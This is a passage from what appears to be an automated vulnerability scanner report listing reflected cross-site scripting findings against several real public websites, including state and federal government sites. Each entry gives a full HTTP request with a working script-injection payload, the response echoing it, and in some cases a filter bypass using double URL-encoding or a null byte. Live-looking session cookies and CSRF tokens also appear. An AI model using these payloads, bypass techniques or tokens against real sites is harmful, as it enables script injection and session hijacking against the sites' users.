Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:22:59 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views47fae<script>alert(1)</script>4549fe22511/dz4w-xbzm.json"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 144

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views47fae<script>alert(1)</script>4549fe22511/dz4w-xbzm.json\""
}

3.30. http://data.ok.gov/views/dz4w-xbzm.json [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/dz4w-xbzm.json

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 15f5f<script>alert(1)</script>140110ceca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/dz4w-xbzm.json15f5f<script>alert(1)</script>140110ceca3?accessType=WEBSITE&method=getDefaultView&_=1304162592421 HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 11:23:00 GMT
Server: Apache
X-Error-Code: not_found
X-Error-Message: No service for "/views/dz4w-xbzm.json15f5f<script>alert(1)</script>140110ceca3"
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 144

{
"code" : "not_found",
"error" : true,
"message" : "No service for \"/views/dz4w-xbzm.json15f5f<script>alert(1)</script>140110ceca3\""
}

3.31. http://data.ok.gov/views/dz4w-xbzm.json [accessType parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /views/dz4w-xbzm.json

Issue detail

The value of the accessType request parameter is copied into the HTML document as plain text between tags. The payload dd487<script>alert(1)</script>0451757cc11 was submitted in the accessType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /views/dz4w-xbzm.json?accessType=WEBSITEdd487<script>alert(1)</script>0451757cc11&method=opening&referrer=http%3A%2F%2Fdata.ok.gov%2F HTTP/1.1
Host: data.ok.gov
Proxy-Connection: keep-alive
Referer: http://data.ok.gov/Public-Safety-And-Defense/Oklahoma-Ignition-Interlock-Service-Centers-Map/dz4w-xbzm
Origin: http://data.ok.gov
X-CSRF-Token: iR+NktWzrQ/EwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk=
X-Requested-With: XMLHttpRequest
X-App-Token: U29jcmF0YS0td2VraWNrYXNz0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.2.10.1304162509; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D
Content-Length: 0

Response

HTTP/1.1 400 Bad Request
Date: Sat, 30 Apr 2011 11:22:59 GMT
Server: Apache
X-Error-Code: invalid_request
X-Error-Message: Invalid Input: 'WEBSITEdd487<script>alert(1)</script>0451757cc11'
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 134

{
"code" : "invalid_request",
"error" : true,
"message" : "Invalid Input: 'WEBSITEdd487<script>alert(1)</script>0451757cc11'"
}

3.32. http://data.ok.gov/w/dz4w-xbzm/q69b-3vw6 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.ok.gov
Path:   /w/dz4w-xbzm/q69b-3vw6

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e5d4%2527%253balert%25281%2529%252f%252fbf0a987d411 was submitted in the REST URL parameter 3. This input was echoed as 3e5d4';alert(1)//bf0a987d411 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /w/dz4w-xbzm/q69b-3vw63e5d4%2527%253balert%25281%2529%252f%252fbf0a987d411 HTTP/1.1
Host: data.ok.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: logged_in=; __utmz=120904477.1304162509.1.1.utmcsr=ok.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; socrata-csrf-token=iR%2BNktWzrQ%2FEwlB20ldODmBNsYTJ3DZuQuUjyKwBSMk%3D; __utma=120904477.1835992193.1304162509.1304162509.1304162509.1; __utmc=120904477; __utmb=120904477.3.9.1304162592440; _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:49 GMT
Server: Apache
ETag: "5e71223ce2a2fc54bd7a852be2cc895e"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: logged_in=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _blist_session_id=%7C%7CBAh7BzoPc2Vzc2lvbl9pZCIlYzk5MTE2M2JlMDU4NTBlMTU5Yzk1ZTY0ODZjM2Y2ZGM6EF9jc3JmX3Rva2VuSSIxaVIrTmt0V3pyUS9Fd2xCMjBsZE9EbUJOc1lUSjNEWnVRdVVqeUt3QlNNaz0GOgZFRg%3D%3D--1098e8b56bd95463731c8eef82a95969875cec27; path=/; HttpOnly
Content-Length: 54893
Status: 200
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<!--[if lte IE 6]><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="
...[SNIP]...
":2,"display_name":"Publishing"},"activity":{"show":true,"order":3,"display_name":"Activity"},"summary":{"show":true,"order":4,"display_name":"Summary"}}};
blist.widget.customizationId = 'q69b-3vw63e5d4';alert(1)//bf0a987d411';
blist.widget.enabledModules = {"allow_comments":false};
</script>
...[SNIP]...

3.33. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c85df"><script>alert(1)</script>17c823d3499 was submitted in the REST URL parameter 1. This input was echoed as c85df"><script>alert(1)</script>17c823d3499 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /submit%00c85df"><script>alert(1)</script>17c823d3499 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=-779404137262479208%3A203; expires=Sun, 01-May-2011 12:20:27 GMT; path=/; domain=digg.com
Set-Cookie: d=b60ad842c047fafa1d59aadf9b298fb4159420a84c636adc57b031f514698993; expires=Thu, 29-Apr-2021 22:28:07 GMT; path=/; domain=.digg.com
X-Digg-Time: D=990255 10.2.129.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16976

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00c85df"><script>alert(1)</script>17c823d3499.rss">
...[SNIP]...

3.34. http://fonts.gawker.com/k/zvc4iwz-c-6179963-143.eot [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c-6179963-143.eot

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d230<script>alert(1)</script>1efb78a005f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k8d230<script>alert(1)</script>1efb78a005f/zvc4iwz-c-6179963-143.eot?...[SNIP]... HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:17:45 GMT
Server: nginx/0.8.36
X-Runtime: 0.000716
Content-Length: 80

Not Found: /k8d230<script>alert(1)</script>1efb78a005f/zvc4iwz-c-6179963-143.eot

3.35. http://fonts.gawker.com/k/zvc4iwz-c-6179963-143.eot [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c-6179963-143.eot

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3bc80<script>alert(1)</script>e38aeaf411d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/zvc4iwz-c-6179963-143.eot3bc80<script>alert(1)</script>e38aeaf411d?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:17:49 GMT
Server: nginx/0.8.36
X-Runtime: 0.001059
Content-Length: 80

Not Found: /k/zvc4iwz-c-6179963-143.eot3bc80<script>alert(1)</script>e38aeaf411d

3.36. http://fonts.gawker.com/k/zvc4iwz-c-6179963-147.eot [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c-6179963-147.eot

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf0cf<script>alert(1)</script>0d7a4e436fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kbf0cf<script>alert(1)</script>0d7a4e436fb/zvc4iwz-c-6179963-147.eot?...[SNIP]... HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:17:41 GMT
Server: nginx/0.8.36
X-Runtime: 0.001864
Content-Length: 80

Not Found: /kbf0cf<script>alert(1)</script>0d7a4e436fb/zvc4iwz-c-6179963-147.eot

3.37. http://fonts.gawker.com/k/zvc4iwz-c-6179963-147.eot [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c-6179963-147.eot

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 813a5<script>alert(1)</script>f0b8d2f525 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/zvc4iwz-c-6179963-147.eot813a5<script>alert(1)</script>f0b8d2f525?3bb2a6e53c9684ffdc9a98f3125b2a626c095928039adb8cca8e16c915a159b0f3c8d256a5ec264208bbf5cbd1783600e65386356fa35d50982087f520acbb9763065409424973295f46d8d9db605d324f45829106861751ccba125a79487b746ad1ec2508547ea754a6edb66e38116953b75739dfe7f6f95a3018b5ce990280ee1d258bc715dd5bbcf830e9831cdd9209903a493236912cbfcda237a49fcd46a4cd122c6d741bbd7614db135bb3b420f1e3ebf246bcad7673a1494255af32690eff20cde61fbdaf8132c6201d88ad4a6e2d879073b84c58b4ba30a25390f9b8d872313c611595ee7d571ff19bba591cf054af39838148f48644b1c65b49804518c7 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:17:44 GMT
Server: nginx/0.8.36
X-Runtime: 0.001129
Content-Length: 79

Not Found: /k/zvc4iwz-c-6179963-147.eot813a5<script>alert(1)</script>f0b8d2f525

3.38. http://fonts.gawker.com/k/zvc4iwz-c.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 605a9<script>alert(1)</script>86a4621de3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k605a9<script>alert(1)</script>86a4621de3c/zvc4iwz-c.css?...[SNIP]... HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:16:37 GMT
Server: nginx/0.8.36
X-Runtime: 0.001229
Content-Length: 68

Not Found: /k605a9<script>alert(1)</script>86a4621de3c/zvc4iwz-c.css

3.39. http://fonts.gawker.com/k/zvc4iwz-c.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.gawker.com
Path:   /k/zvc4iwz-c.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d5b02<script>alert(1)</script>513a81272f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/zvc4iwz-c.cssd5b02<script>alert(1)</script>513a81272f?...[SNIP]... HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: fonts.gawker.com

Response

HTTP/1.1 404 Not Found
Content-Type: text/plain
Date: Sat, 30 Apr 2011 12:16:41 GMT
Server: nginx/0.8.36
X-Runtime: 0.000829
Content-Length: 67

Not Found: /k/zvc4iwz-c.cssd5b02<script>alert(1)</script>513a81272f

3.40. http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frwebgate.access.gpo.gov
Path:   /cgi-bin/getdoc.cgi

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6f6ed<script>alert(1)</script>087b8e52043 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/getdoc.cgi?6f6ed<script>alert(1)</script>087b8e52043=1 HTTP/1.1
Host: frwebgate.access.gpo.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:20:42 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11294

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/secondarypage.dwt" codeOutsideHTMLIsLocke
...[SNIP]...
<H1>Invalid variable in query string [6f6ed<script>alert(1)</script>087b8e52043=]<PRE>
...[SNIP]...

3.41. http://image.providesupport.com/cmd/hic [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/hic

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 517d6<script>alert(1)</script>73d0c14f42b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmd517d6<script>alert(1)</script>73d0c14f42b/hic?ps_t=1304201425960&ps_l=http%3A//www.ehawaii.gov/dakine/index.html&ps_r=http%3A//hawaii.gov/&ps_s=QfuX2q273YN8 HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=QfuX2q273YN8

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sat, 30 Apr 2011 22:10:04 GMT
Content-Length: 562

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmd517d6<script>alert(1)</script>73d0c14f42b/hic?ps_t=1304201425960&ps_l=http://www.ehawaii.gov/dakine/index.html&ps_r=http://hawaii.gov/&ps_s=QfuX2q273YN8
</pre>
...[SNIP]...

3.42. http://image.providesupport.com/js/hic/safe-standard.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53eab<script>alert(1)</script>d1c17481add was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js53eab<script>alert(1)</script>d1c17481add/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sat, 30 Apr 2011 22:10:05 GMT
Content-Length: 574

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /js53eab<script>alert(1)</script>d1c17481add/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http://www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http://www.ehawaii.gov/dakine/images/portal-offline.gif
</pre>
...[SNIP]...

3.43. http://image.providesupport.com/js/hic/safe-standard.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ce743<a>741cad1e216 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /js/hicce743<a>741cad1e216/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Sat, 30 Apr 2011 22:10:05 GMT
Content-Length: 556

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
Page: /js/hicce743<a>741cad1e216/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif
</pre>
...[SNIP]...

3.44. http://image.providesupport.com/js/hic/safe-standard.js [offline-image parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The value of the offline-image request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc550'%3balert(1)//5fb7e8addbb was submitted in the offline-image parameter. This input was echoed as fc550';alert(1)//5fb7e8addbb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.giffc550'%3balert(1)//5fb7e8addbb HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI CURa ADMa DEVa OUR IND COM NAV", policyref="/w3c/p3p.xml"
Content-Type: application/x-javascript
Cache-Control: must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: vsid=JeUKDNrsBTvD;Path=/;Domain=.providesupport.com
Content-Length: 4989
Date: Sat, 30 Apr 2011 22:10:04 GMT
Connection: close

var psMygbsid = "JeUKDNrsBTvD";
// safe-standard@gecko.js

var psMygbiso;
try {
   psMygbiso = (opener != null) && (typeof(opener.name) != "unknown") && (opener.psMygbwid != null);
} catch(e) {
   psMygb
...[SNIP]...
<img name="psMygbimage" src="http://www.ehawaii.gov/dakine/images/portal-offline.giffc550';alert(1)//5fb7e8addbb" border="0">
...[SNIP]...

3.45. http://image.providesupport.com/js/hic/safe-standard.js [offline-image parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /js/hic/safe-standard.js

Issue detail

The value of the offline-image request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44157"%3balert(1)//7ed92f9d11a was submitted in the offline-image parameter. This input was echoed as 44157";alert(1)//7ed92f9d11a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /js/hic/safe-standard.js?ps_h=Mygb&ps_t=1304201424421&online-image=http%3A//www.ehawaii.gov/dakine/images/portal-online.gif&offline-image=http%3A//www.ehawaii.gov/dakine/images/portal-offline.gif44157"%3balert(1)//7ed92f9d11a HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.ehawaii.gov/dakine/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
